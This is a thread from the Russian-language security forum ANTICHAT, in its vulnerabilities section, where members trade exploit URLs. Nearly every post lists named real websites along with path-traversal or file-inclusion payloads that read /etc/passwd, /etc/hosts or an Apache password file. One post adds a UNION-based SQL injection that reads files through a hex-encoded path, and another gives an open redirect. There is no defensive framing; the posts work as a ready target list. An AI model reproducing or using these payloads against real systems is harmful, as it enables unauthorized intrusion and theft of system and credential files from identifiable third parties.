HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.11.2009, 12:51
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://www.expert-line.com/static.php?file=../../../../../../../../etc/passwd

http://www.expert-line.com/static.php?file=../../../../../../../../etc/group
 
Ответить с цитированием

  #2  
Старый 07.11.2009, 22:26
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

http://www.siemens-ha.com.cn/download.php?url=../../../../etc/passwd%00

http://www.blaineywellness.com/index.php?file=../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #3  
Старый 08.11.2009, 15:42
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.truthaboutevolution.net/index.php?page=../../../../etc/passwd
==============================
http://www.plagron.fr/index.php?page=../../../../etc/hosts

Последний раз редактировалось Bb0y; 08.11.2009 в 22:59..
 
Ответить с цитированием

  #4  
Старый 09.11.2009, 09:38
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
http://www.nylho.com/index.php?content_file=../../../etc/passwd
http://www.waterstarsauna.com/support/index.php?include_file=../../../../../../../../../../etc/passwd
http://www.ontherun.ca/articles.php?sort=name&dir=/&file=etc/passwd
http://www.advantica.hr/?file=/usr/local/apache/conf/htpasswd-apache-status
http://www.kegerator.net/index.php?file=/etc/passwd
Проявляю активность! =)
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #5  
Старый 09.11.2009, 18:51
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

http://datinginukraine.com/privacy.php?language_id=../../../../../../etc/passwd%00

http://www.simchaonline.com/privacy.php?language_id=../../../../../../etc/passwd%00
 
Ответить с цитированием

  #6  
Старый 09.11.2009, 19:02
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

http://www.cis-promotion.com/index.php?file=../../../../../../../../../etc/passwd

http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #7  
Старый 09.11.2009, 19:01
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://yungdarius.comli.com/page.php?url=http://google.com
 
Ответить с цитированием

  #8  
Старый 09.11.2009, 22:58
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию

http://vsmarts.com/iSupport/index.php?

include_file=../../../../../../../../../../../../../../../../../../../../../etc/passwd

Последний раз редактировалось gromoza; 10.11.2009 в 00:47..
 
Ответить с цитированием

  #9  
Старый 10.11.2009, 20:35
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
http://www.greenbergresearch.com/index.php?ID=-2398+union+select+1,2,3,4,5,6,7,8,9,10,11,12,0x2f2 e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7 06173737764,14--+
данные фильтруються потому и HEX вид.
Можно инклудить, здесь /../../../../../../etc/passwd
переводить, например, через http://www.yellowpipe.com/yis/tools/encrypter/index.php
 
Ответить с цитированием

  #10  
Старый 10.11.2009, 20:38
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
данные фильтруються потому и HEX вид.
Можно инклудить, здесь /../../../../../../etc/passwd
переводить, например, через http://www.yellowpipe.com/yis/tools/encrypter/index.php
1. Это не PHP, а SQL - инъекция.
2. Это чтение файла через SQL-Инъекцию, а не инклюд.
3. Данные не фильтруются, а слешируются.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ